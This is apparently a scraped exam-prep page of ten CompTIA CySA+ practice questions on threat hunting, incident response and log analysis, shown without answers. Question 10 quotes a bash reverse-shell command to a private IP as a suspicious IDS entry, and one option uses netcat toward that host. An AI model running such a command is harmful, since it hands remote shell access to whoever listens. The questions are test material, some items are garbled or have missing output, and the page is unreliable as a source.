Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA CompTIA CySA+ CS0-003 Questions and answers with CertsForce

Viewing page 1 out of 15 pages
Viewing questions 1-10 out of questions
Questions # 1:

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.

It provides analytical pivoting and identifies knowledge gaps.


B.

It guarantees that the discovered vulnerability will not be exploited again in the future.


C.

It provides concise evidence that can be used in court


D.

It allows for proactive detection and analysis of attack events


Expert Solution
Questions # 2:

A company discovers that its proprietary information is being sold on the dark web. A security analyst uses threat hunting to search for signs of compromise. After running a network packet capture tool, the analyst identifies millions of packets similar to the following:

Internet Protocol Version 4, src: 192.168.1.2, dst: 104.21.75.76

Internet Control Message Protocol

Type: 8 Echo request

Code: 0

Checksum: 0x34db [correct]

Sequence number: 3362

No response seen

Data: 64 bytes

Data payload: 0e1bS8…157ea2054af44…9865b34857a05…24b45824…

The analyst does not detect or identify any other abnormalities. Which of the following is most likely the malicious activity in this scenario?

Options:

A.

An insider is using an IP command-and-control channel to sell proprietary information.


B.

A threat actor is performing exfiltration over an alternative protocol.


C.

A machine was infected with a virus that is trying to propagate.


D.

A hacktivist is conducting an ICMP DDoS attack against the company.


Expert Solution
Questions # 3:

An IT professional is reviewing the output from the top command in Linux. In this company, only IT and security staff are allowed to have elevated privileges. Both departments have confirmed they are not working on anything that requires elevated privileges. Based on the output below:

PID

USER

VIRT

RES

SHR

%CPU

%MEM

TIME+

COMMAND

34834

person

4980644

224288

111076

5.3

14.44

1:41.44

cinnamon

34218

person

51052

30920

23828

4.7

0.2

0:26.54

Xorg

2264

root

449628

143500

26372

14.0

3.1

0:12.38

bash

35963

xrdp

711940

42356

10560

2.0

0.2

0:06.81

xrdp

Which of the following PIDs is most likely to contribute to data exfiltration?

Options:

A.

2264


B.

34218


C.

34834


D.

35963


Expert Solution
Questions # 4:

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention


B.

Log rotation


C.

Maximum log size


D.

Threshold value


Expert Solution
Questions # 5:

A security audit for unsecured network services was conducted, and the following output was generated:

Question # 5

Which of the following services should the security team investigate further? (Select two).

Options:

A.

21


B.

22


C.

23


D.

636


E.

1723


F.

3389


Expert Solution
Questions # 6:

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).

Options:

A.

Drop the tables on the database server to prevent data exfiltration.


B.

Deploy EDR on the web server and the database server to reduce the adversaries capabilities.


C.

Stop the httpd service on the web server so that the adversary can not use web exploits


D.

use micro segmentation to restrict connectivity to/from the web and database servers.


E.

Comment out the HTTP account in the / etc/passwd file of the web server


F.

Move the database from the database server to the web server.


Expert Solution
Questions # 7:

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents


B.

Backup data


C.

Temporary files


D.

Running processes


Expert Solution
Questions # 8:

An organization has implemented code into a production environment. During a routine test, a penetration tester found that some of the code had a backdoor implemented, causing a developer to make changes outside of the change management windows. Which of the following is the best way to prevent this issue?

Options:

A.

SDLC training


B.

Dynamic analysis


C.

Debugging


D.

Source code review


Expert Solution
Questions # 9:

A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techniques would deliver the expected results?

Options:

A.

Malicious command interpretation


B.

Network monitoring


C.

User behavior analysis


D.

SSL inspection


Expert Solution
Questions # 10:

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i > & /dev/tcp/10.1.2.3/8080 0 > & 1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bashnc 10.1.2.3 8080 -vv > dev/null & & echo " Malicious activity " Il echo " OK "


B.

#!/bin/bashps -fea | grep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "


C.

#!/bin/bashls /opt/tcp/10.1.2.3/8080 > dev/null & & echo " Malicious activity " I| echo " OK "


D.

#!/bin/bashnetstat -antp Igrep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "


Expert Solution
Viewing page 1 out of 15 pages
Viewing questions 1-10 out of questions